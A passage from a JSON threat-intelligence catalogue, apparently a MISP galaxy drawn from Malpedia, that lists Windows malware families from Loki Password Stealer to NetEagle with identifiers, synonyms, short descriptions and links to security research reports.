"https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", 
"https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/" ], "synonyms": [ "Loki", "LokiBot", "LokiPWS" ], "type": [] }, "uuid": "b8fa5036-813f-4887-b4d4-bb17b4a7eba0", "value": "Loki Password Stealer (PWS)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix", "https://twitter.com/hexlax/status/1058356670835908610" ], "synonyms": [], "type": [] }, "uuid": "fa61a690-fd9c-4036-97fb-bf3674aa60b2", "value": "Lordix" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark" ], "synonyms": [], "type": [] }, "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", "value": "Luminosity RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk", "https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader" ], "synonyms": [], "type": [] }, "uuid": "929112e4-e252-4273-b3c2-fd414cfb2776", "value": "Lurk" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luzo" ], "synonyms": [], "type": [] }, "uuid": "8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2", "value": "Luzo" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit", "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html", "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/", "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html" ], "synonyms": [ "Adneukine", "Bomba Locker", "Lucky Locker" ], "type": [] }, "uuid": "0dea3e9d-b443-40f6-a9e0-ba622850ee8a", "value": "Lyposit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete", "https://securelist.com/el-machete/66108/", "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6" ], "synonyms": [ "El Machete" ], "type": [] }, "uuid": "9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff", "value": "Machete" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax", "https://www.arbornetworks.com/blog/asert/mad-max-dga/" ], "synonyms": [], "type": [] }, "uuid": "42760c2c-bf00-4ace-871c-6dcbbd90b2de", "value": "MadMax" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magala", "https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/" ], "synonyms": [], "type": [] }, "uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b", "value": "Magala" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber", "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", "https://www.youtube.com/watch?v=lqWJaaofNf4", "http://asec.ahnlab.com/1124" ], "synonyms": [], "type": [] }, "uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29", "value": "Magniber" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos", 
"http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/" ], "synonyms": [], "type": [] }, "uuid": "c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9", "value": "MajikPos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs", "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" ], "synonyms": [], "type": [] }, "uuid": "996e73e9-b093-4987-9992-f52008e55b24", "value": "Makadocs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader", "https://twitter.com/James_inthe_box/status/1046844087469391872" ], "synonyms": [], "type": [] }, "uuid": "7e088669-3ddb-4cc5-bc9b-ae59f61ada82", "value": "MakLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub", "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/", "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html", "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/" ], "synonyms": [], "type": [] }, "uuid": "bdb27944-1f79-46f7-a0d7-c344429790c2", "value": "Maktub" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos", "http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf" ], "synonyms": [], "type": [] }, "uuid": "159b0dbf-52f6-4690-a545-0f890ba7b9b7", "value": "MalumPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba", "https://securelist.com/the-return-of-mamba-ransomware/79403/", "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/" ], "synonyms": [ "DiskCryptor", "HDDCryptor" ], "type": [] }, 
"uuid": "df320366-7970-4af0-b1f4-9f9492dede53", "value": "Mamba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manamecrypt", "https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/", "https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route" ], "synonyms": [ "CryptoHost" ], "type": [] }, "uuid": "54cd671e-b7e4-4dd3-9bfa-dc0ba5105944", "value": "ManameCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel", "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2" ], "synonyms": [ "junidor", "mengkite", "vedratve" ], "type": [] }, "uuid": "ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0", "value": "Mangzamel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manifestus_ransomware", "https://twitter.com/struppigel/status/811587154983981056" ], "synonyms": [], "type": [] }, "uuid": "5b75db42-b8f2-4e52-81d3-f329e49e1af2", "value": "Manifestus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6", "value": "ManItsMe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "8a97307f-a029-4c43-88e1-debed2b80b14", "value": "MAPIget" }, { "description": "Marap is a downloader, named after its command and control (C&C) phone home parameter \"param\" spelled backwards. 
It is written in C and contains a few notable anti-analysis features.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap" ], "synonyms": [], "type": [] }, "uuid": "c2c3ac24-6921-4bba-a2c8-ac3d364feaeb", "value": "Marap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker", "https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/" ], "synonyms": [], "type": [] }, "uuid": "59717468-271e-4d15-859a-130681c17ddb", "value": "Matrix Banker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom", "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf" ], "synonyms": [], "type": [] }, "uuid": "118ced99-5942-497f-885a-2b25d0569b4b", "value": "Matrix Ransom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat", "http://www.clearskysec.com/tulip/" ], "synonyms": [], "type": [] }, "uuid": "c8a7c6e7-c6d3-4978-8a1d-190162de5e0d", "value": "Matryoshka RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu", "https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf" ], "synonyms": [], "type": [] }, "uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a", "value": "Matsnu" }, { "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock", "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html", "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", 
"https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100", "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d" ], "synonyms": [ "DexLocker" ], "type": [] }, "uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791", "value": "MBRlock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi", "https://www.symantec.com/connect/blogs/bios-threat-showing-again", "https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/", "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html", "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/" ], "synonyms": [ "MyBios" ], "type": [] }, "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6", "value": "Mebromi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medre", "http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html" ], "synonyms": [], "type": [] }, "uuid": "243ae1f7-183e-4ea9-82cf-3353a0ef78f4", "value": "Medre" }, { "description": "Medusa is a DDoS bot written in .NET 2.0. 
In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa", "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/", "https://news.drweb.com/show/?i=10302&lng=en", "https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/" ], "synonyms": [], "type": [] }, "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", "value": "Medusa" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo", "https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html", "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html" ], "synonyms": [ "Casbaneiro" ], "type": [] }, "uuid": "18dc3e7a-600d-4e5f-a283-86156b938530", "value": "Metamorfo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei" ], "synonyms": [], "type": [] }, "uuid": "48cb12ee-c60a-46cd-b376-39226027c616", "value": "Mewsei" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha", "https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf" ], "synonyms": [], "type": [] }, "uuid": "a3370013-6c47-422e-a4d4-1b86ee71e5e5", "value": "Miancha" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" ], "synonyms": [], "type": [] }, "uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6", "value": "Micrass" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin", "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/", "https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf" ], "synonyms": [], "type": [] }, "uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa", "value": "Microcin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", "http://blog.talosintelligence.com/2017/06/palestine-delphi.html", "https://research.checkpoint.com/apt-attack-middle-east-big-bang/" ], "synonyms": [], "type": [] }, "uuid": "b37f312f-a0b1-41a9-88ae-da2844c19cae", "value": "Micropsia" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi" ], "synonyms": [], "type": [] }, "uuid": "87abb59d-0012-4d45-9e75-136372b25bf8", "value": "Mikoponi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2", "value": "MILKMAID" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz", "https://github.com/gentilkiwi/mimikatz", "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" ], "synonyms": [], "type": [] }, "uuid": "588fb91d-59c6-4667-b299-94676d48b17b", "value": "MimiKatz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], 
"synonyms": [], "type": [] }, "uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41", "value": "MiniASP" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage", "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" ], "synonyms": [], "type": [] }, "uuid": "6f6da371-2d62-4245-9aa3-8570e39222ae", "value": "Mirage" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox", "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" ], "synonyms": [], "type": [] }, "uuid": "b3e89b03-c5af-41cd-88b8-e15335abbb30", "value": "MirageFox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai", "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/", "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html", "https://twitter.com/PhysicalDrive0/status/830070569202749440" ], "synonyms": [], "type": [] }, "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", "value": "Mirai (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat", "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "d1597713-fe7a-45bd-8b59-1a13c7e097d8", "value": "Misdat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox" ], "synonyms": [ "MixFox", "ModPack" ], "type": [] }, "uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da", "value": "Misfox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref" ], "synonyms": [], "type": [] }, "uuid": "4c786624-4a55-46e6-849d-b65552034235", "value": "Miuref" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core", 
"https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" ], "synonyms": [], "type": [] }, "uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd", "value": "MM Core" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mobi_rat", "https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/" ], "synonyms": [], "type": [] }, "uuid": "e33aa1f8-a631-4274-afe0-f2fd3426332e", "value": "MobiRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton" ], "synonyms": [], "type": [] }, "uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d", "value": "Mocton" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpos", "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html", "https://twitter.com/physicaldrive0/status/670258429202530306" ], "synonyms": [ "straxbot" ], "type": [] }, "uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a", "value": "ModPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker", "https://breakingmalware.com/malware/moker-part-2-capabilities/", "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/", "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/", "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network" ], "synonyms": [], "type": [] }, "uuid": "90a1a61e-3e69-4b92-ac11-9095ac2d9cf4", "value": "Moker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes", "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" ], "synonyms": [], "type": [] }, "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", "value": "Mokes (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole", 
"https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware", "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/" ], "synonyms": [], "type": [] }, "uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f", "value": "Mole" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader", "http://www.clearskysec.com/iec/", "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf" ], "synonyms": [], "type": [] }, "uuid": "b50408c3-6676-4d3f-8a97-9114c215b67a", "value": "Molerat Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner", "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/" ], "synonyms": [ "CoinMiner" ], "type": [] }, "uuid": "c57a4168-cd09-4611-a665-bbcede80f42b", "value": "Monero Miner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" ], "synonyms": [], "type": [] }, "uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460", "value": "MoonWind" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.morphine" ], "synonyms": [], "type": [] }, "uuid": "9de41613-7762-4a88-8e9a-4e621a127f32", "value": "Morphine" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto", "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html", "https://www.f-secure.com/weblog/archives/00002227.html", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A" ], "synonyms": [], "type": [] }, "uuid": "c931dc7d-9373-4545-911c-ad5589670c40", "value": 
"Morto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito", "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" ], "synonyms": [], "type": [] }, "uuid": "663df641-d396-4e93-93bd-bb9609ceb0ba", "value": "Mosquito" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure" ], "synonyms": [], "type": [] }, "uuid": "bd3468e4-5e00-46e6-a884-6eda1b246394", "value": "Moure" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart", "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html" ], "synonyms": [], "type": [] }, "uuid": "dde61acb-8c0f-4a3a-8450-96e233f2ddc1", "value": "mozart" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" ], "synonyms": [], "type": [] }, "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621", "value": "MPKBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos", "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/", "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html" ], "synonyms": [], "type": [] }, "uuid": "c513c490-7c76-42ab-a51f-cc780faa7146", "value": "Multigrain POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" ], "synonyms": [], "type": [] }, 
"uuid": "2685ea45-06f4-46e0-9397-eff8844db855", "value": "murkytop" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet" ], "synonyms": [], "type": [] }, "uuid": "f7081626-130a-48d5-83a9-759b3ef198ec", "value": "Murofet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha", "http://vms.drweb.ru/virus/?_is=1&i=8477920" ], "synonyms": [], "type": [] }, "uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5", "value": "Mutabaha" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader", "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" ], "synonyms": [], "type": [] }, "uuid": "ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed", "value": "MyKings Spreader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot", "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/" ], "synonyms": [], "type": [] }, "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2", "value": "MyloBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40", "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector" ], "synonyms": [], "type": [] }, "uuid": "6f0109a5-7cec-4a49-8b27-e18ad5c6cae6", "value": "N40" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur" ], "synonyms": [], "type": [] }, "uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd", "value": "Nabucur" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini", "http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/" 
], "synonyms": [], "type": [] }, "uuid": "0ec7d065-3418-43ba-a0cc-1e06471893ad", "value": "Nagini" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e", "value": "Naikon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/" ], "synonyms": [], "type": [] }, "uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4", "value": "Nanocore RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker" ], "synonyms": [], "type": [] }, "uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b", "value": "NanoLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam", "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html", "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage" ], "synonyms": [], "type": [] }, "uuid": "f5a262c7-59ed-42d1-884d-f8d29acf353f", "value": "Narilam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus", "https://www.ncsc.gov.uk/alerts/turla-group-malware" ], "synonyms": [], "type": [] }, "uuid": "d8295eba-60ef-4900-8091-d694180de565", "value": "Nautilus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat", "https://blog.talosintelligence.com/2018/05/navrat.html?m=1" ], "synonyms": [], "type": [] }, 
"uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872", "value": "NavRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs", "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features", "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html", "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors", "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/", "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/" ], "synonyms": [ "nucurs" ], "type": [] }, "uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb", "value": "Necurs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim", "https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf" ], "synonyms": [ "Nemain" ], "type": [] }, "uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428", "value": "Nemim" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netc", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "0bc03bfa-1439-4162-bb33-ec9f8f952ee5", "value": "NetC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [ "ScoutEagle" ], "type": [] }, "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5", "value": 